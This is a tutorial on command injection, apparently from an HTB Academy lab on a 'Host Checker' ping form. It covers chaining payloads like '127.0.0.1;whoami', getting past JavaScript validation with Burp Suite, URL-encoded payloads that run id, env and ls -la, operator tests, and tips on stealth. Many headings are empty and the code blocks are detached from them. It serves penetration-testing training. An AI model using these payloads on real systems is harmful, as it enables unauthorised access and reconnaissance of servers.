After identifying a potentially vulnerable web application through detection methods, the next step is to craft and execute successful command injection payloads. This section demonstrates practical exploitation techniques, including bypassing common front-end validation mechanisms.
Focus: Transitioning from detection to successful command execution through systematic payload crafting and delivery.
Basic Injection Attempt
Initial Payload Construction
Target: Host Checker web application
Vulnerable Parameter: IP address input field
Expected Backend Command:ping -c 1 OUR_INPUT
Payload Construction:
# Base input127.0.0.1# Injection operator;# Injected command whoami# Final payload127.0.0.1;whoami
Resulting Backend Command:
Local Verification
Testing Payload Locally:
Analysis: The command executes successfully locally, showing both ping output and the username (21y4d), confirming our injection syntax is correct.
Front-End Validation Encounter
Initial Injection Attempt
Payload Submission:
Response:
Validation Analysis
Identifying Front-End Validation:
Step 1: Use Browser Developer Tools
Step 2: Retry the Request
Submit the malicious payload again
Monitor the Network tab for HTTP requests
Observation:
Conclusion:
No HTTP request was sent to the server
Validation is happening client-side (front-end)
Error message originates from JavaScript validation
β JavaScript error handling visible in page source
Why This Happens:
Different teams - Front-end and back-end developed separately
Trust in client-side - Assuming front-end validation is sufficient
Performance optimization - Reducing server load
User experience - Immediate feedback without server round-trip
Bypassing Front-End Validation
Web Proxy Interception Method
Step 1: Configure Web Proxy
Burp Suite Setup:
ZAP Alternative:
Step 2: Intercept Legitimate Request
Process:
Enable proxy intercept in Burp Suite (Intercept β Intercept is on)
Submit a valid IP address (e.g., 127.0.0.1) in the web application
Capture the legitimate HTTP request
Send the request to Repeater (Ctrl + R)
Step 3: Captured Request Analysis
Sample HTTP Request:
Payload Modification and Execution
Step 4: Craft Malicious Request
Original Parameter:
Modified Parameter:
Step 5: URL Encoding
Why URL Encoding is Needed:
Special characters may be interpreted incorrectly
Ensures payload is transmitted as intended
Bypasses basic string filtering
URL Encoding Process:
URL Encoding Reference:
Step 6: Send Modified Request
Final HTTP Request:
Successful Exploitation
Response Analysis
Successful Injection Response:
Key Indicators of Success:
β Ping output displayed - Original functionality preserved
β Injected command output - www-data appears after ping results
β Both commands executed - Semicolon separator worked correctly
β Server-side execution - Command ran with web server privileges
Exploitation Confirmation
Evidence of Successful Injection:
1. Command Output Structure:
2. Execution Context:
3. Response Timing:
Alternative Injection Operators
Testing Multiple Operators
Once basic injection is confirmed, test other operators:
1. AND Operator (&&):
2. OR Operator (||):
3. Pipe Operator (|):
4. Background Operator (&):
5. Newline Operator (\n):
Operator-Specific Behaviors
Semicolon (;) - Command Chaining:
AND (&&) - Success-Dependent:
OR (||) - Failure-Dependent:
Pipe (|) - Output Redirection:
Exploitation Verification
System Enumeration Commands
Basic Information Gathering:
Example Payloads:
Expected Output Analysis
Successful uname -a injection:
Successful id injection:
Front-End Source Code Analysis
Identifying Validation Logic
HTB Academy Lab Exercise:
Task: Review the HTML source code to find where front-end input validation is happening. On which line number is it?
Investigation Steps:
1. View Page Source:
2. Search for Validation Keywords:
3. JavaScript Analysis:
4. Form Handler Identification:
Best Practices for Basic Exploitation
Systematic Approach
1. Start with Safe Commands:
2. Gradual Complexity:
3. Document Working Payloads:
Security Considerations
Responsible Testing:
Use non-destructive commands only
Avoid creating files or modifying system state
Document all activities for reporting
Respect scope and authorization limits
Stealth Considerations:
Monitor response times for detection
Avoid commands that generate logs (if stealth required)
Use common system utilities that blend in
Consider rate limiting between requests
This systematic approach ensures reliable command injection exploitation while maintaining operational security and providing clear documentation for reporting purposes.
Summary
Key Takeaways:
Front-end validation is insufficient - Can be easily bypassed with web proxies
URL encoding is crucial - Ensures payload integrity during transmission
Multiple operators should be tested - Different environments may filter specific characters
Systematic enumeration - Build from basic commands to complex operations
Documentation is essential - Track successful vectors for reporting and further exploitation
Next Steps: With basic exploitation confirmed, proceed to advanced techniques like blind command injection, filter bypass methods, and persistence mechanisms.
# Injected command result
www-data
# Indicates:
# - Command executed on server
# - Running as www-data user (web server)
# - Linux/Unix environment
# - Successful privilege escalation from browser to server
# Second command only if first succeeds
ping -c 1 127.0.0.1 && whoami
# Output: [ping results] + [whoami results] (if ping succeeds)
# Second command only if first fails
ping -c 1 invalid_ip || whoami
# Output: [ping error] + [whoami results]
# First command output piped to second
ping -c 1 127.0.0.1 | whoami
# Output: [whoami results only]
# User context
whoami
id
# System information
hostname
uname -a
# Current directory
pwd
ls -la
# Environment
env
# System identification
ip=127.0.0.1%3b%20uname%20-a
# User enumeration
ip=127.0.0.1%3b%20id
# Directory listing
ip=127.0.0.1%3b%20ls%20-la
# Environment variables
ip=127.0.0.1%3b%20env
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
Linux web-server 5.4.0-74-generic #83-Ubuntu SMP x86_64 GNU/Linux
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Right-click β View Page Source
OR
Ctrl + U (Firefox/Chrome)
// Common validation patterns to search for:
- function validate
- input validation
- pattern matching
- regex validation
- IP address validation
- onclick handlers
- form validation
// Example front-end validation (line 17):
function validateIP(ip) {
var pattern = /^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/;
if (!pattern.test(ip)) {
alert("Match the requested format");
return false;
}
return true;
}
<!-- Example form with validation -->
<form onsubmit="return validateIP(document.getElementById('ip').value)">
<input type="text" id="ip" name="ip" placeholder="Enter an IP Address">
<button type="submit">Check</button>
</form>
# Non-destructive enumeration
whoami
hostname
pwd
# Progress from simple to complex
whoami # Basic execution
id # User context
uname -a # System information
ls -la /etc/passwd # File enumeration
# Keep track of successful operators
β ; (semicolon) - Works
β && (AND) - Works
β || (OR) - Filtered
? | (pipe) - Untested